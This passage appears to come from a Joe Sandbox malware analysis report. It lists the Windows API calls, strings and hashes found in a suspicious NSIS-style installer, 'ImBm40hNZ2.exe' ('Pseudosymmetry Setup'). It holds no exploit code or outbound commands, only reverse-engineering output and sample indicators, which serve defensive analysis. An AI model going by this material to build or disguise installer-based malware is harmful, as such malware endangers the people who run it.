                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A0
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004050B3
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004050C1
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050D4
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004050F6
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040510A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040512B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040513B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405154
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405160
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405038
                                                                                                                                                                                                                                                                  • Part of subcall function 00403EB4: SendMessageA.USER32(00000028,?,00000001,00403CE5), ref: 00403EC2
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040517C
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004F4E,00000000), ref: 0040518A
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405191
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004051B4
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004051BB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405201
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405235
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405246
                                                                                                                                                                                                                                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040525B
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000000FF), ref: 0040527B
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405294
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D0
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 004052E0
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004052E6
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004052EF
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004052F9
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040530D
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405326
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405331
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405337
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 590372296-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040430C
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00000000,?), ref: 00404336
                                                                                                                                                                                                                                                                • SHBrowseForFolderA.SHELL32(?,00428BF8,?), ref: 004043E7
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004043F2
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(Call,00429820), ref: 00404424
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,Call), ref: 00404430
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404442
                                                                                                                                                                                                                                                                  • Part of subcall function 00405389: GetDlgItemTextA.USER32(?,?,00000400,00404479), ref: 0040539C
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E76
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(004287F0,?,?,0000040F,?,004287F0,004287F0,?,00000000,004287F0,?,?,000003FB,?), ref: 004044FD
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404518
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000400,004287E0), ref: 0040459E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens$Call$XRS
                                                                                                                                                                                                                                                                • API String ID: 2246997448-1237832267
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039E8
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403A05
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00403A19
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A35
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403A56
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6A
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403A71
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403B1F
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403B29
                                                                                                                                                                                                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403B43
                                                                                                                                                                                                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B94
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403C3A
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403C5B
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403C6D
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403C88
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C9E
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403CA5
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CBD
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD0
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429820,?,00429820,Pseudosymmetry Setup), ref: 00403CF9
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,00429820), ref: 00403D08
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403E3C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                                                • String ID: Pseudosymmetry Setup
                                                                                                                                                                                                                                                                • API String ID: 184305955-3340433627
                                                                                                                                                                                                                                                                • Opcode ID: 0f83a02af2a00702a4c2e4b6ad351fce485f3e04a4e7970156617f1793b5832a
                                                                                                                                                                                                                                                                • Instruction ID: 70023f4bb34e935c1cca3693f676be707b54b1f0636591b75eec942e7e5b916a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f83a02af2a00702a4c2e4b6ad351fce485f3e04a4e7970156617f1793b5832a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7C1B171A04200BBEB216F61ED45E2B3EACEB49706F50053EF541B21E1C779A942DB6E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404053
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404067
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404085
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404096
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A5
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B4
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 004040B7
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040C6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DB
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040413D
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00404140
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040416B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AB
                                                                                                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004041BA
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004041C3
                                                                                                                                                                                                                                                                • ShellExecuteA.SHELL32(0000070B,open,0042D340,00000000,00000000,00000001), ref: 004041D6
                                                                                                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004041E3
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004041E6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404212
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404226
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                                                                • String ID: Call$N$XRS$open
                                                                                                                                                                                                                                                                • API String ID: 3615053054-3294337457
                                                                                                                                                                                                                                                                • Opcode ID: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
                                                                                                                                                                                                                                                                • Instruction ID: 4a720cbc7ced66984b2347167a4dd5be7871a0de437cfd71c5777b4804bda38e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA61C2B1A40209BFEB109F61CC45F6A7B69FB84701F10407AFB00BA2D1C7B8A951CF99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                                                • DrawTextA.USER32(00000000,Pseudosymmetry Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F$Pseudosymmetry Setup
                                                                                                                                                                                                                                                                • API String ID: 941294808-1567132306
                                                                                                                                                                                                                                                                • Opcode ID: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
                                                                                                                                                                                                                                                                • Instruction ID: 56390ffcd2b5ebfb5c65d4f338f2fcdd02e5d2b15fd4a6b60b61e3d9fa1f9be4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E418971804249AFCB058F95DD459AFBBB9FF44311F00812AF962AA1A0C738EA51DFA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(0042B5B0,NUL,?,00000000,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058D9
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058FD
                                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(00000000,0042B5B0,00000400), ref: 00405906
                                                                                                                                                                                                                                                                  • Part of subcall function 00405787: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
                                                                                                                                                                                                                                                                  • Part of subcall function 00405787: lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9
                                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,0042B9B0,00000400), ref: 00405923
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00405941
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B9B0,C0000000,00000004,0042B9B0,?,?,?,?,?), ref: 0040597C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040598B
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059C3
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,0042B1B0,00000000,-0000000A,0040936C,00000000,[Rename],00000000,00000000,00000000), ref: 00405A19
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A2B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405A32
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A39
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: GetFileAttributesA.KERNELBASE(?,00402C69,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 00405826
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                • API String ID: 1265525490-4148678300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 1000243D
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002455
                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002466
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 1000247B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002482
                                                                                                                                                                                                                                                                  • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 100024F0
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002519
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2278267121-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E76
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                • API String ID: 589700163-325535441
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000EB), ref: 00403F03
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403F1F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403F2B
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403F37
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403F4A
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403F5A
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403F74
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403F7E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 100022CD
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 100022F7
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1000230C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 1000231B
                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 10002328
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 1000232F
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002366
                                                                                                                                                                                                                                                                  • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3955009414-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 0040272C
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3294113728-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00402FBC,00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,0041AFD0,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                                                                                                                                                • Opcode ID: da25758ff77001f8ee08d8ede5d2d983a8fe2c8000e2bc2a3511aae1abe8cb5f
                                                                                                                                                                                                                                                                • Instruction ID: bec9e42dfe10d11ae3f9da453690961036ef7877893a7332badb98976ce689fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da25758ff77001f8ee08d8ede5d2d983a8fe2c8000e2bc2a3511aae1abe8cb5f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B218C71D00118BADF119FA5CC80E9EBFB9EF44358F00807AF944B6291C739AE40CBA8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404762
